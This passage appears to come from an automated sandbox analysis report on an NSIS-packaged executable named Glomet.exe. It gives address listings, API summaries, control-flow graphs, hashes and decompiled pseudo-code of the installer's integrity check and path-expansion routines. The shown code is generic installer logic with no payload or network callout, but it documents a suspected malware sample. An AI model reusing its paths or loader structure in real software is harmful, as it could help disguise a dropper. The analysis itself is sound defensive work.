                                                                                                                                                                              0x00403cf3
                                                                                                                                                                              0x00403cd9
                                                                                                                                                                              0x00403cdf
                                                                                                                                                                              0x00403ce7
                                                                                                                                                                              0x00403ce7
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00403cdf
                                                                                                                                                                              0x00403c54
                                                                                                                                                                              0x00403c5f
                                                                                                                                                                              0x00403c64
                                                                                                                                                                              0x00403c66
                                                                                                                                                                              0x00403c6d
                                                                                                                                                                              0x00403c6d
                                                                                                                                                                              0x00403c78
                                                                                                                                                                              0x00403c80
                                                                                                                                                                              0x00403c82
                                                                                                                                                                              0x00403c84
                                                                                                                                                                              0x00403c8d
                                                                                                                                                                              0x00403c90
                                                                                                                                                                              0x00403c96
                                                                                                                                                                              0x00403c96
                                                                                                                                                                              0x00403c9c
                                                                                                                                                                              0x00403cb5
                                                                                                                                                                              0x00403cc6
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00403ccb
                                                                                                                                                                              0x00403c33
                                                                                                                                                                              0x00403c35
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00403baa
                                                                                                                                                                              0x00403baa
                                                                                                                                                                              0x00403bb6
                                                                                                                                                                              0x00403bc0
                                                                                                                                                                              0x00403bc6
                                                                                                                                                                              0x00403bcb
                                                                                                                                                                              0x00403bda
                                                                                                                                                                              0x00403cf8
                                                                                                                                                                              0x00403cf8
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00403cf8
                                                                                                                                                                              0x00403be9
                                                                                                                                                                              0x00403c24
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00403c24
                                                                                                                                                                              0x00403aec
                                                                                                                                                                              0x00403aec
                                                                                                                                                                              0x00403aef
                                                                                                                                                                              0x00403af1
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00403afb
                                                                                                                                                                              0x00403b0b
                                                                                                                                                                              0x00403b10
                                                                                                                                                                              0x00403b17
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00403b1b
                                                                                                                                                                              0x00403b1d
                                                                                                                                                                              0x00403b2a
                                                                                                                                                                              0x00403b2a
                                                                                                                                                                              0x00403b32
                                                                                                                                                                              0x00403b38
                                                                                                                                                                              0x00403b60
                                                                                                                                                                              0x00403b68
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00403b4a
                                                                                                                                                                              0x00403b4b
                                                                                                                                                                              0x00403b54
                                                                                                                                                                              0x00403b5a
                                                                                                                                                                              0x00403b5b
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00403b5b
                                                                                                                                                                              0x00403b56
                                                                                                                                                                              0x00403b58
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00403b58
                                                                                                                                                                              0x00403b38

                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00406663: GetModuleHandleA.KERNEL32(?,00000000,?,004034F5,0000000B), ref: 00406675
                                                                                                                                                                                • Part of subcall function 00406663: GetProcAddress.KERNEL32(00000000,?), ref: 00406690
                                                                                                                                                                              • lstrcatA.KERNEL32(1033,ARBEJDSTILLADELSER Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,ARBEJDSTILLADELSER Setup: Installing,00000000,00000002,7620FA90,C:\Users\user\AppData\Local\Temp\,?,"C:\programdata\Glomet.exe" ,00000009,0000000B), ref: 00403AB8
                                                                                                                                                                              • lstrlenA.KERNEL32(ExecToStack,?,?,?,ExecToStack,00000000,C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens,1033,ARBEJDSTILLADELSER Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,ARBEJDSTILLADELSER Setup: Installing,00000000,00000002,7620FA90), ref: 00403B2D
                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,.exe,ExecToStack,?,?,?,ExecToStack,00000000,C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens,1033,ARBEJDSTILLADELSER Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,ARBEJDSTILLADELSER Setup: Installing,00000000), ref: 00403B40
                                                                                                                                                                              • GetFileAttributesA.KERNEL32(ExecToStack,?,"C:\programdata\Glomet.exe" ,00000009,0000000B), ref: 00403B4B
                                                                                                                                                                              • LoadImageA.USER32 ref: 00403B94
                                                                                                                                                                                • Part of subcall function 004061B5: wsprintfA.USER32 ref: 004061C2
                                                                                                                                                                              • RegisterClassA.USER32 ref: 00403BD1
                                                                                                                                                                              • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403BE9
                                                                                                                                                                              • CreateWindowExA.USER32 ref: 00403C1E
                                                                                                                                                                              • ShowWindow.USER32(00000005,00000000,?,"C:\programdata\Glomet.exe" ,00000009,0000000B), ref: 00403C54
                                                                                                                                                                              • GetClassInfoA.USER32 ref: 00403C80
                                                                                                                                                                              • GetClassInfoA.USER32 ref: 00403C8D
                                                                                                                                                                              • RegisterClassA.USER32 ref: 00403C96
                                                                                                                                                                              • DialogBoxParamA.USER32 ref: 00403CB5
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                              • String ID: "C:\programdata\Glomet.exe" $.DEFAULT\Control Panel\International$.exe$1033$ARBEJDSTILLADELSER Setup: Installing$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens$Control Panel\Desktop\ResourceLocale$ExecToStack$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                                                                              • API String ID: 1975747703-1442869569
                                                                                                                                                                              • Opcode ID: 5d1d30c75a064e7bda6b95d80f93f8a0715b3eed65dfff273a47cad5aa74555f
                                                                                                                                                                              • Instruction ID: 6db815c1d0a977664f3d39510f8e98c50f9dfcfb4850e4c10674fdff383f0bc2
                                                                                                                                                                              • Opcode Fuzzy Hash: 5d1d30c75a064e7bda6b95d80f93f8a0715b3eed65dfff273a47cad5aa74555f
                                                                                                                                                                              • Instruction Fuzzy Hash: C061B9716442046EE620BF669D46F373A7CEB54709F40443FF941B62D3CB7CA9069A2D
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 00402F0C Relevance: 26.4, APIs: 5, Strings: 10, Instructions: 181memoryCOMMON
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 376 402f0c-402f5a GetTickCount GetModuleFileNameA call 405dea 379 402f66-402f94 call 406257 call 405c30 call 406257 GetFileSize 376->379 380 402f5c-402f61 376->380 388 402f9a 379->388 389 40307f-40308d call 402ea8 379->389 381 40313c-403140 380->381 391 402f9f-402fb6 388->391 395 4030e2-4030e7 389->395 396 40308f-403092 389->396 393 402fb8 391->393 394 402fba-402fc3 call 403355 391->394 393->394 402 4030e9-4030f1 call 402ea8 394->402 403 402fc9-402fd0 394->403 395->381 398 403094-4030ac call 40336b call 403355 396->398 399 4030b6-4030e0 GlobalAlloc call 40336b call 403143 396->399 398->395 424 4030ae-4030b4 398->424 399->395 423 4030f3-403104 399->423 402->395 407 402fd2-402fe6 call 405da5 403->407 408 40304c-403050 403->408 413 40305a-403060 407->413 427 402fe8-402fef 407->427 412 403052-403059 call 402ea8 408->412 408->413 412->413 418 403062-40306c call 40671a 413->418 419 40306f-403077 413->419 418->419 419->391 422 40307d 419->422 422->389 428 403106 423->428 429 40310c-403111 423->429 424->395 424->399 427->413 431 402ff1-402ff8 427->431 428->429 433 403112-403118 429->433 431->413 432 402ffa-403001 431->432 432->413 434 403003-40300a 432->434 433->433 435 40311a-403135 SetFilePointer call 405da5 433->435 434->413 436 40300c-40302c 434->436 439 40313a 435->439 436->395 438 403032-403036 436->438 440 403038-40303c 438->440 441 40303e-403046 438->441 439->381 440->422 440->441 441->413 442 403048-40304a 441->442 442->413
                                                                                                                                                                              C-Code - Quality: 80%
                                                                                                                                                                              			E00402F0C(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _t43;
				signed int _t50;
				void* _t53;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				signed int _t65;
				signed int _t70;
				signed int _t71;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				signed int _t85;
				signed int _t87;
				void* _t89;
				signed int _t90;
				signed int _t93;
				void* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				_t43 = GetTickCount();
				_t91 = "C:\\programdata\\Glomet.exe";
				 *0x42f42c = _t43 + 0x3e8;
				GetModuleFileNameA(0, "C:\\programdata\\Glomet.exe", 0x400);
				_t89 = E00405DEA(_t91, 0x80000000, 3);
				_v16 = _t89;
				 *0x40a018 = _t89;
				if(_t89 == 0xffffffff) {
					return "Error launching installer";
				}
				_t92 = "C:\\programdata";
				E00406257("C:\\programdata", _t91);
				E00406257(0x437000, E00405C30(_t92));
				_t50 = GetFileSize(_t89, 0);
				__eflags = _t50;
				 *0x42944c = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00402EA8(1);
					__eflags =  *0x42f434 - _t82;
					if( *0x42f434 == _t82) {
						goto L29;
					}
					__eflags = _v8 - _t82;
					if(_v8 == _t82) {
						L28:
						_t53 = GlobalAlloc(0x40, _v24); // executed
						_t94 = _t53;
						E0040336B( *0x42f434 + 0x1c);
						_push(_v24);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff); // executed
						_t57 = E00403143(); // executed
						__eflags = _t57 - _v24;
						if(_t57 == _v24) {
							__eflags = _v44 & 0x00000001;
							 *0x42f430 = _t94;
							 *0x42f438 =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x42f43c =  *0x42f43c + 1;
								__eflags =  *0x42f43c;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
								__eflags = _t85;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E00405DA5(0x42f440, _t94 + 4, 0x40);
							__eflags = 0;
							return 0;
						}
						goto L29;
					}
					E0040336B( *0x41d440);
					_t65 = E00403355( &_a4, 4);
					__eflags = _t65;
					if(_t65 == 0) {
						goto L29;
					}
					__eflags = _v12 - _a4;
					if(_v12 != _a4) {
						goto L29;
					}
					goto L28;
				} else {
					do {
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~( *0x42f434) & 0x00007e00) + 0x200;
						__eflags = _t93 - _t70;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						_t71 = E00403355(0x415440, _t90);
						__eflags = _t71;
						if(_t71 == 0) {
							E00402EA8(1);
							L29:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x42f434;
						if( *0x42f434 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402EA8(0);
							}
							goto L20;
						}
						E00405DA5( &_v44, 0x415440, 0x1c);
						_t77 = _v44;
						__eflags = _t77 & 0xfffffff0;
						if((_t77 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v40 - 0xdeadbeef;
						if(_v40 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v28 - 0x74736e49;
						if(_v28 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v32 - 0x74666f73;
						if(_v32 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v36 - 0x6c6c754e;
						if(_v36 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t77;
						_t87 =  *0x41d440; // 0x52b4c
						 *0x42f4c0 =  *0x42f4c0 | _a4 & 0x00000002;
						_t80 = _v20;
						__eflags = _t80 - _t93;
						 *0x42f434 = _t87;
						if(_t80 > _t93) {
							goto L29;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v8 = _v8 + 1;
							_t24 = _t80 - 4; // 0x5
							_t93 = _t24;
							__eflags = _t90 - _t93;
							if(_t90 > _t93) {
								_t90 = _t93;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t93 -  *0x42944c; // 0x54a40
						if(__eflags < 0) {
							_v12 = E0040671A(_v12, 0x415440, _t90);
						}
						 *0x41d440 =  *0x41d440 + _t90;
						_t93 = _t93 - _t90;
						__eflags = _t93;
					} while (_t93 != 0);
					_t82 = 0;
					__eflags = 0;
					goto L24;
				}
			}































                                                                                                                                                                              0x00402f14
                                                                                                                                                                              0x00402f17
                                                                                                                                                                              0x00402f1a
                                                                                                                                                                              0x00402f1d
                                                                                                                                                                              0x00402f23
                                                                                                                                                                              0x00402f34
                                                                                                                                                                              0x00402f39
                                                                                                                                                                              0x00402f4c
                                                                                                                                                                              0x00402f51
                                                                                                                                                                              0x00402f54
                                                                                                                                                                              0x00402f5a
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00402f5c
                                                                                                                                                                              0x00402f67
                                                                                                                                                                              0x00402f6d
                                                                                                                                                                              0x00402f7e
                                                                                                                                                                              0x00402f85
                                                                                                                                                                              0x00402f8b
                                                                                                                                                                              0x00402f8d
                                                                                                                                                                              0x00402f92
                                                                                                                                                                              0x00402f94
                                                                                                                                                                              0x0040307f
                                                                                                                                                                              0x00403081
                                                                                                                                                                              0x00403086
                                                                                                                                                                              0x0040308d
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x0040308f
                                                                                                                                                                              0x00403092
                                                                                                                                                                              0x004030b6
                                                                                                                                                                              0x004030bb
                                                                                                                                                                              0x004030c1
                                                                                                                                                                              0x004030cc
                                                                                                                                                                              0x004030d1
                                                                                                                                                                              0x004030d4
                                                                                                                                                                              0x004030d5
                                                                                                                                                                              0x004030d6
                                                                                                                                                                              0x004030d8
                                                                                                                                                                              0x004030dd
                                                                                                                                                                              0x004030e0
                                                                                                                                                                              0x004030f3
                                                                                                                                                                              0x004030f7
                                                                                                                                                                              0x004030ff
                                                                                                                                                                              0x00403104
                                                                                                                                                                              0x00403106
                                                                                                                                                                              0x00403106
                                                                                                                                                                              0x00403106
                                                                                                                                                                              0x0040310e
                                                                                                                                                                              0x0040310e
                                                                                                                                                                              0x00403111
                                                                                                                                                                              0x00403112
                                                                                                                                                                              0x00403112
                                                                                                                                                                              0x00403115
                                                                                                                                                                              0x00403117
                                                                                                                                                                              0x00403117
                                                                                                                                                                              0x00403117
                                                                                                                                                                              0x00403121
                                                                                                                                                                              0x00403127
                                                                                                                                                                              0x00403135
                                                                                                                                                                              0x0040313a
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x0040313a
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004030e0
                                                                                                                                                                              0x0040309a
                                                                                                                                                                              0x004030a5
                                                                                                                                                                              0x004030aa
                                                                                                                                                                              0x004030ac
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004030b1
                                                                                                                                                                              0x004030b4
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00402f9a
                                                                                                                                                                              0x00402f9f
                                                                                                                                                                              0x00402fa4
                                                                                                                                                                              0x00402fa8
                                                                                                                                                                              0x00402faf
                                                                                                                                                                              0x00402fb4
                                                                                                                                                                              0x00402fb6
                                                                                                                                                                              0x00402fb8
                                                                                                                                                                              0x00402fb8
                                                                                                                                                                              0x00402fbc
                                                                                                                                                                              0x00402fc1
                                                                                                                                                                              0x00402fc3
                                                                                                                                                                              0x004030eb
                                                                                                                                                                              0x004030e2
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004030e2
                                                                                                                                                                              0x00402fc9
                                                                                                                                                                              0x00402fd0
                                                                                                                                                                              0x0040304c
                                                                                                                                                                              0x00403050
                                                                                                                                                                              0x00403054
                                                                                                                                                                              0x00403059
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00403050
                                                                                                                                                                              0x00402fd9
                                                                                                                                                                              0x00402fde
                                                                                                                                                                              0x00402fe1
                                                                                                                                                                              0x00402fe6
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00402fe8
                                                                                                                                                                              0x00402fef
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00402ff1
                                                                                                                                                                              0x00402ff8
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00402ffa
                                                                                                                                                                              0x00403001
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00403003
                                                                                                                                                                              0x0040300a
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x0040300c
                                                                                                                                                                              0x00403012
                                                                                                                                                                              0x0040301b
                                                                                                                                                                              0x00403021
                                                                                                                                                                              0x00403024
                                                                                                                                                                              0x00403026
                                                                                                                                                                              0x0040302c
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00403032
                                                                                                                                                                              0x00403036
                                                                                                                                                                              0x0040303e
                                                                                                                                                                              0x0040303e
                                                                                                                                                                              0x00403041
                                                                                                                                                                              0x00403041
                                                                                                                                                                              0x00403044
                                                                                                                                                                              0x00403046
                                                                                                                                                                              0x00403048
                                                                                                                                                                              0x00403048
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00403046
                                                                                                                                                                              0x00403038
                                                                                                                                                                              0x0040303c
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x0040305a
                                                                                                                                                                              0x0040305a
                                                                                                                                                                              0x00403060
                                                                                                                                                                              0x0040306c
                                                                                                                                                                              0x0040306c
                                                                                                                                                                              0x0040306f
                                                                                                                                                                              0x00403075
                                                                                                                                                                              0x00403075
                                                                                                                                                                              0x00403075
                                                                                                                                                                              0x0040307d
                                                                                                                                                                              0x0040307d
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x0040307d

                                                                                                                                                                              APIs
                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00402F1D
                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\programdata\Glomet.exe,00000400,?,?,004036FD,?,?,00000007,00000009,0000000B), ref: 00402F39
                                                                                                                                                                                • Part of subcall function 00405DEA: GetFileAttributesA.KERNELBASE(00000003,00402F4C,C:\programdata\Glomet.exe,80000000,00000003,?,?,004036FD,?,?,00000007,00000009,0000000B), ref: 00405DEE
                                                                                                                                                                                • Part of subcall function 00405DEA: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,004036FD,?,?,00000007,00000009,0000000B), ref: 00405E10
                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,00437000,00000000,C:\programdata,C:\programdata,C:\programdata\Glomet.exe,C:\programdata\Glomet.exe,80000000,00000003,?,?,004036FD,?,?,00000007), ref: 00402F85
                                                                                                                                                                              • GlobalAlloc.KERNELBASE(00000040,00000007,?,?,004036FD,?,?,00000007,00000009,0000000B), ref: 004030BB
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                                                                              • String ID: "C:\programdata\Glomet.exe" $@TA$C:\Users\user\AppData\Local\Temp\$C:\programdata$C:\programdata\Glomet.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                                                                                                                              • API String ID: 2803837635-2172206961
                                                                                                                                                                              • Opcode ID: a3529526dccc432a2db2b40383ee9d4975bb57828a7b0874a879935de9d3a064
                                                                                                                                                                              • Instruction ID: 70ffca3bdba6f18ae0426a301ce6e6f0801d42355b595fcaf053b8d4d934ef0e
                                                                                                                                                                              • Opcode Fuzzy Hash: a3529526dccc432a2db2b40383ee9d4975bb57828a7b0874a879935de9d3a064
                                                                                                                                                                              • Instruction Fuzzy Hash: B351D371A01204ABDB20AF64DD85B9B7EBCEB1431AF60813BF500B62D1C7BC9E458B5D
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 004062EA Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 198stringCOMMON
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 443 4062ea-4062f5 444 4062f7-406306 443->444 445 406308-40631e 443->445 444->445 446 406512-406516 445->446 447 406324-40632f 445->447 449 406341-40634b 446->449 450 40651c-406526 446->450 447->446 448 406335-40633c 447->448 448->446 449->450 451 406351-406358 449->451 452 406531-406532 450->452 453 406528-40652c call 406257 450->453 454 406505 451->454 455 40635e-406392 451->455 453->452 457 406507-40650d 454->457 458 40650f-406511 454->458 459 4064b2-4064b5 455->459 460 406398-4063a2 455->460 457->446 458->446 463 4064e5-4064e8 459->463 464 4064b7-4064ba 459->464 461 4063a4-4063ad 460->461 462 4063bf 460->462 461->462 467 4063af-4063b2 461->467 470 4063c6-4063cd 462->470 465 4064f6-406503 lstrlenA 463->465 466 4064ea-4064f1 call 4062ea 463->466 468 4064ca-4064d6 call 406257 464->468 469 4064bc-4064c8 call 4061b5 464->469 465->446 466->465 467->462 475 4063b4-4063b7 467->475 479 4064db-4064e1 468->479 469->479 471 4063d2-4063d4 470->471 472 4063cf-4063d1 470->472 477 4063d6-4063f1 call 40613e 471->477 478 40640d-406410 471->478 472->471 475->462 480 4063b9-4063bd 475->480 486 4063f6-4063f9 477->486 484 406420-406423 478->484 485 406412-40641e GetSystemDirectoryA 478->485 479->465 483 4064e3 479->483 480->470 487 4064aa-4064b0 call 406535 483->487 489 406490-406492 484->489 490 406425-406433 GetWindowsDirectoryA 484->490 488 406494-406497 485->488 491 406499-40649d 486->491 492 4063ff-406408 call 4062ea 486->492 487->465 488->487 488->491 489->488 493 406435-40643f 489->493 490->489 491->487 496 40649f-4064a5 lstrcatA 491->496 492->488 498 406441-406444 493->498 499 406459-40646f SHGetSpecialFolderLocation 493->499 496->487 498->499 503 406446-40644d 498->503 500 406471-40648b SHGetPathFromIDListA CoTaskMemFree 499->500 501 40648d 499->501 500->488 500->501 501->489 504 406455-406457 503->504 504->488 504->499
                                                                                                                                                                              C-Code - Quality: 72%
                                                                                                                                                                              			E004062EA(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				struct _ITEMIDLIST* _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed int _t36;
				CHAR* _t37;
				signed int _t39;
				char _t50;
				char _t52;
				char _t54;
				void* _t62;
				char* _t63;
				signed int _t77;
				intOrPtr _t83;
				char _t85;
				void* _t86;
				CHAR* _t87;
				void* _t89;
				signed int _t94;
				signed int _t96;
				void* _t97;

				_t89 = __esi;
				_t86 = __edi;
				_t62 = __ebx;
				_t36 = _a8;
				if(_t36 < 0) {
					_t83 =  *0x42ebfc; // 0x5a1993
					_t36 =  *(_t83 - 4 + _t36 * 4);
				}
				_push(_t62);
				_push(_t89);
				_push(_t86);
				_t63 = _t36 +  *0x42f458;
				_t37 = 0x42e3c0;
				_t87 = 0x42e3c0;
				if(_a4 >= 0x42e3c0) {
					_t6 =  &_a4; // 0x422e48
					if( *_t6 - 0x42e3c0 < 0x800) {
						_t7 =  &_a4; // 0x422e48
						_t87 =  *_t7;
						_a4 = _a4 & 0x00000000;
					}
				}
				while(1) {
					_t85 =  *_t63;
					if(_t85 == 0) {
						break;
					}
					__eflags = _t87 - _t37 - 0x400;
					if(_t87 - _t37 >= 0x400) {
						break;
					}
					_t63 = _t63 + 1;
					__eflags = _t85 - 4;
					_a8 = _t63;
					if(__eflags >= 0) {
						if(__eflags != 0) {
							 *_t87 = _t85;
							_t87 =  &(_t87[1]);
							__eflags = _t87;
						} else {
							 *_t87 =  *_t63;
							_t87 =  &(_t87[1]);
							_t63 = _t63 + 1;
						}
						continue;
					}
					_t39 =  *((char*)(_t63 + 1));
					_t77 =  *_t63;
					_t94 = (_t39 & 0x0000007f) << 0x00000007 | _t77 & 0x0000007f;
					_v24 = _t77;
					_v28 = _t77 | 0x00000080;
					_v16 = _t39;
					_v20 = _t39 | 0x00000080;
					_t63 = _a8 + 2;
					__eflags = _t85 - 2;
					if(_t85 != 2) {
						__eflags = _t85 - 3;
						if(_t85 != 3) {
							__eflags = _t85 - 1;
							if(_t85 == 1) {
								__eflags = (_t39 | 0xffffffff) - _t94;
								E004062EA(_t63, _t87, _t94, _t87, (_t39 | 0xffffffff) - _t94);
							}
							L42:
							_t87 =  &(_t87[lstrlenA(_t87)]);
							_t37 = 0x42e3c0;
							continue;
						}
						__eflags = _t94 - 0x1d;
						if(_t94 != 0x1d) {
							__eflags = (_t94 << 0xa) + 0x430000;
							E00406257(_t87, (_t94 << 0xa) + 0x430000);
						} else {
							E004061B5(_t87,  *0x42f428);
						}
						__eflags = _t94 + 0xffffffeb - 7;
						if(_t94 + 0xffffffeb < 7) {
							L33:
							E00406535(_t87);
						}
						goto L42;
					}
					__eflags =  *0x42f4dc;
					_t96 = 2;
					if( *0x42f4dc != 0) {
						L13:
						_a8 = 1;
						L14:
						__eflags =  *0x42f4a4;
						if( *0x42f4a4 != 0) {
							_t96 = 4;
						}
						__eflags = _t77;
						if(__eflags >= 0) {
							__eflags = _t77 - 0x25;
							if(_t77 != 0x25) {
								__eflags = _t77 - 0x24;
								if(_t77 == 0x24) {
									GetWindowsDirectoryA(_t87, 0x400);
									_t96 = 0;
								}
								while(1) {
									__eflags = _t96;
									if(_t96 == 0) {
										goto L30;
									}
									_t50 =  *0x42f424;
									_t96 = _t96 - 1;
									__eflags = _t50;
									if(_t50 == 0) {
										L26:
										_t52 = SHGetSpecialFolderLocation( *0x42f428,  *(_t97 + _t96 * 4 - 0x18),  &_v8);
										__eflags = _t52;
										if(_t52 != 0) {
											L28:
											 *_t87 =  *_t87 & 0x00000000;
											__eflags =  *_t87;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v8, _t87);
										_v12 = _t52;
